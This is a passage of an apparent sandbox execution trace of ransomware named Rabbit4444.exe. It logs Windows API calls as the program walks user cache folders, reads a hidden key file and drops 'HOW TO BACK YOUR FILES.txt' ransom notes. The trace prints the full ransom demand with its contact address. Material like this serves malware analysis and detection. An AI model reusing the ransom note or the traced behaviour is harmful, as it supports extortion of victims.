(lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.197] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.197] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2082fdf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0c67541, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.197] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.197] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.197] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.197] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.199] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.199] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0c67541, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0c67541, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0c67541, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.199] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.199] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.199] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0c67541, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0c67541, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0c67541, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.199] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0066.199] lstrcpyW (in: lpString1=0x11ceac8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.199] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.199] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.200] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.200] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.200] CloseHandle (hObject=0x27c) returned 1 [0066.200] CloseHandle (hObject=0x228) returned 1 [0066.200] GetCurrentThreadId () returned 0xd1c [0066.200] RtlInterlockedPopEntrySList (in: ListHead=0x122048 | out: ListHead=0x122048) returned 0x0 [0066.200] GetCurrentThreadId () returned 0xd1c [0066.200] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce120*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0066.200] RtlInterlockedPopEntrySList (in: ListHead=0x122048 | out: ListHead=0x122048) returned 0x0 [0066.200] RtlInterlockedFlushSList (in: ListHead=0x122048 | out: ListHead=0x122048) returned 0x0 [0066.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0066.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff6f8 | out: hHeap=0xe0000) returned 1 [0066.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11aba8 | out: hHeap=0xe0000) returned 1 [0066.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0066.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10d1e8 | out: hHeap=0xe0000) returned 1 Thread: id = 21 os_tid = 0x7a8 [0065.033] lstrlenA (lpString="c4 +k 6S PN PE 9c Cf oS 2o tL js d4 HL Vg 0i 25\r\nGa Vc iL s3 rU m9 Qn jx IK s6 mg qk 1g eX XB ME\r\n3T lu WN Ar 9c PX qv 2P ww kC rO xM AB bS s4 YT\r\nc0 sX XT 3f mh yy D5 VM Wi 8V RB YH FE m3 OS B+\r\nWO z4 19 ZT ls bF Bh AL F+ W3 fi 4N Hv mB zx 3l\r\noU 7E QY GA ww sw UQ SK HI RV +H 7+ jd l5 Eu nd\r\naw KJ ue WG lT Lh h6 76 mr hb sU rQ fo v9 Gz cy\r\nWA pB Wj pW iO Up Aa Rk zT uj IK 2k VE 6l gS ZW\r\nv7 o7 Im vB 7Z L8 X9 eq Jl SA w6 QU tU 2q 2g iu\r\n+6 fJ XQ yl gM +u Ef vX yQ Mf 2Y Pd Bu HZ q+ vD\r\n2p Lv ts hw CA DF YX 2G +6 RJ zf mB l1 T5 vv se\r\n5t l+ zg O2 yC j3 aI b8 vC bV SX 9v c/ e9 zQ jv\r\nc+ /n kf +B cd sG vr tL bA hX tb 6i k9 iD Eq vV\r\nDT o+ BK UP 4f fy r5 Lk R3 r9 X2 yt bn Eb 06 7F\r\nIt L4 te Cn eS so 2h lG aH 74 HX BN OR qt po vh\r\n6Q E9 cQ vZ Ti W9 pK Jb 44 m6 1K EU 48 9K YL KK\r\ngM 66 Qu Ff XF aj hr Wx 0k rx ik 7z uK Zo tF 6v\r\n14 7B j3 m8 kn U3 wJ Un 3t wH vN JG Xk XH zn oc\r\nyO yG ll SX pO Qz zB 1j /0 /m lt eo 0I Yy yN ZB\r\nIW Np C5 Ts VB rE ls lI bV TS nV Gt 23 tm oZ Zb\r\nyD n0 If Rk dl t4 +k nL 1S Et Br 9i 1V s2 vW wB\r\nAa i8 L1 TU tC I= ") returned 1047 [0065.033] lstrcatA (in: lpString1="", lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0065.033] lstrcatA (in: lpString1="\r\n", lpString2="network" | out: lpString1="\r\nnetwork") returned="\r\nnetwork" [0065.033] lstrlenA (lpString="c4 +k 6S PN PE 9c Cf oS 2o tL js d4 HL Vg 0i 25\r\nGa Vc iL s3 rU m9 Qn jx IK s6 mg qk 1g eX XB ME\r\n3T lu WN Ar 9c PX qv 2P ww kC rO xM AB bS s4 YT\r\nc0 sX XT 3f mh yy D5 VM Wi 8V RB YH FE m3 OS B+\r\nWO z4 19 ZT ls bF Bh AL F+ W3 fi 4N Hv mB zx 3l\r\noU 7E QY GA ww sw UQ SK HI RV +H 7+ jd l5 Eu nd\r\naw KJ ue WG lT Lh h6 76 mr hb sU rQ fo v9 Gz cy\r\nWA pB Wj pW iO Up Aa Rk zT uj IK 2k VE 6l gS ZW\r\nv7 o7 Im vB 7Z L8 X9 eq Jl SA w6 QU tU 2q 2g iu\r\n+6 fJ XQ yl gM +u Ef vX yQ Mf 2Y Pd Bu HZ q+ vD\r\n2p Lv ts hw CA DF YX 2G +6 RJ zf mB l1 T5 vv se\r\n5t l+ zg O2 yC j3 aI b8 vC bV SX 9v c/ e9 zQ jv\r\nc+ /n kf +B cd sG vr tL bA hX tb 6i k9 iD Eq vV\r\nDT o+ BK UP 4f fy r5 Lk R3 r9 X2 yt bn Eb 06 7F\r\nIt L4 te Cn eS so 2h lG aH 74 HX BN OR qt po vh\r\n6Q E9 cQ vZ Ti W9 pK Jb 44 m6 1K EU 48 9K YL KK\r\ngM 66 Qu Ff XF aj hr Wx 0k rx ik 7z uK Zo tF 6v\r\n14 7B j3 m8 kn U3 wJ Un 3t wH vN JG Xk XH zn oc\r\nyO yG ll SX pO Qz zB 1j /0 /m lt eo 0I Yy yN ZB\r\nIW Np C5 Ts VB rE ls lI bV TS nV Gt 23 tm oZ Zb\r\nyD n0 If Rk dl t4 +k nL 1S Et Br 9i 1V s2 vW wB\r\nAa i8 L1 TU tC I= \r\nnetwork") returned 1056 [0065.033] RtlInterlockedPopEntrySList (in: ListHead=0xf68d0 | out: ListHead=0xf68d0) returned 0x0 [0065.033] lstrcatA (in: lpString1="", lpString2="\r\n\r\n" | out: lpString1="\r\n\r\n") returned="\r\n\r\n" [0065.033] lstrlenA (lpString="c4 +k 6S PN PE 9c Cf oS 2o tL js d4 HL Vg 0i 25\r\nGa Vc iL s3 rU m9 Qn jx IK s6 mg qk 1g eX XB ME\r\n3T lu WN Ar 9c PX qv 2P ww kC rO xM AB bS s4 YT\r\nc0 sX XT 3f mh yy D5 VM Wi 8V RB YH FE m3 OS B+\r\nWO z4 19 ZT ls bF Bh AL F+ W3 fi 4N Hv mB zx 3l\r\noU 7E QY GA ww sw UQ SK HI RV +H 7+ jd l5 Eu nd\r\naw KJ ue WG lT Lh h6 76 mr hb sU rQ fo v9 Gz cy\r\nWA pB Wj pW iO Up Aa Rk zT uj IK 2k VE 6l gS ZW\r\nv7 o7 Im vB 7Z L8 X9 eq Jl SA w6 QU tU 2q 2g iu\r\n+6 fJ XQ yl gM +u Ef vX yQ Mf 2Y Pd Bu HZ q+ vD\r\n2p Lv ts hw CA DF YX 2G +6 RJ zf mB l1 T5 vv se\r\n5t l+ zg O2 yC j3 aI b8 vC bV SX 9v c/ e9 zQ jv\r\nc+ /n kf +B cd sG vr tL bA hX tb 6i k9 iD Eq vV\r\nDT o+ BK UP 4f fy r5 Lk R3 r9 X2 yt bn Eb 06 7F\r\nIt L4 te Cn eS so 2h lG aH 74 HX BN OR qt po vh\r\n6Q E9 cQ vZ Ti W9 pK Jb 44 m6 1K EU 48 9K YL KK\r\ngM 66 Qu Ff XF aj hr Wx 0k rx ik 7z uK Zo tF 6v\r\n14 7B j3 m8 kn U3 wJ Un 3t wH vN JG Xk XH zn oc\r\nyO yG ll SX pO Qz zB 1j /0 /m lt eo 0I Yy yN ZB\r\nIW Np C5 Ts VB rE ls lI bV TS nV Gt 23 tm oZ Zb\r\nyD n0 If Rk dl t4 +k nL 1S Et Br 9i 1V s2 vW wB\r\nAa i8 L1 TU tC I= \r\nnetwork\r\n\r\n") returned 1060 [0065.034] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.034] SetFilePointer (in: hFile=0x2cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11f4 [0065.034] WriteFile (in: hFile=0x2cc, lpBuffer=0x2e0e0d8*, nNumberOfBytesToWrite=0x424, lpNumberOfBytesWritten=0x2e0e06c, lpOverlapped=0x0 | out: lpBuffer=0x2e0e0d8*, lpNumberOfBytesWritten=0x2e0e06c*=0x424, lpOverlapped=0x0) returned 1 [0065.051] CloseHandle (hObject=0x2cc) returned 1 Thread: id = 22 os_tid = 0xf80 Thread: id = 23 os_tid = 0xfa8 Thread: id = 24 os_tid = 0x60 [0067.271] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x122148 [0067.271] lstrcpynW (in: lpString1=0x11ceb08, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" [0067.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123380 | out: hHeap=0xe0000) returned 1 [0067.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0067.272] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" [0067.272] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\" [0067.272] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0067.272] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0067.272] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" [0067.272] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\" [0067.273] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0067.273] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0067.274] ReadFile (in: hFile=0x29c, lpBuffer=0x11cc6f0, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc6ec, lpOverlapped=0x0 | out: lpBuffer=0x11cc6f0*, lpNumberOfBytesRead=0x11cc6ec*=0x3d4, lpOverlapped=0x0) returned 1 [0067.275] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105560 [0067.275] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.284] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0067.284] lstrlenA (lpString="{{ID}}") returned 6 [0067.285] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0067.286] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x126468 [0067.288] CloseHandle (hObject=0x29c) returned 1 [0067.307] GetLastError () returned 0x0 [0067.308] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned 88 [0067.311] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.312] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x11cdfb8 | out: lpFindFileData=0x11cdfb8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba0882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0f64f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0067.313] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.313] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.313] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.313] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.313] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11cdfb8 | out: lpFindFileData=0x11cdfb8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba0882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0f64f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.316] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.316] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.317] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.320] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.326] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.326] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11cdfb8 | out: lpFindFileData=0x11cdfb8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0f64f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0f64f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0f64f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.326] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.327] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.333] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11cdfb8 | out: lpFindFileData=0x11cdfb8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0f64f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0f64f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0f64f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0067.333] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0067.336] lstrcpyW (in: lpString1=0x11cebba, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.340] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0067.360] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0067.364] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.382] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.382] CloseHandle (hObject=0x280) returned 1 [0067.382] CloseHandle (hObject=0x29c) returned 1 [0067.386] GetCurrentThreadId () returned 0x60 [0067.386] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x0 [0067.386] GetCurrentThreadId () returned 0x60 [0067.386] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce208*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0067.386] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x0 [0067.386] RtlInterlockedFlushSList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x0 [0067.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0067.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff6f8 | out: hHeap=0xe0000) returned 1 [0067.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126468 | out: hHeap=0xe0000) returned 1 [0067.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0067.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 Thread: id = 25 os_tid = 0xbec [0068.794] RtlInterlockedPopEntrySList (in: ListHead=0x1220a8 | out: ListHead=0x1220a8) returned 0x122128 [0068.794] lstrcpynW (in: lpString1=0x11cee40, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache" [0068.794] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b508 | out: hHeap=0xe0000) returned 1 [0068.794] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0068.794] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache" [0068.794] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\") 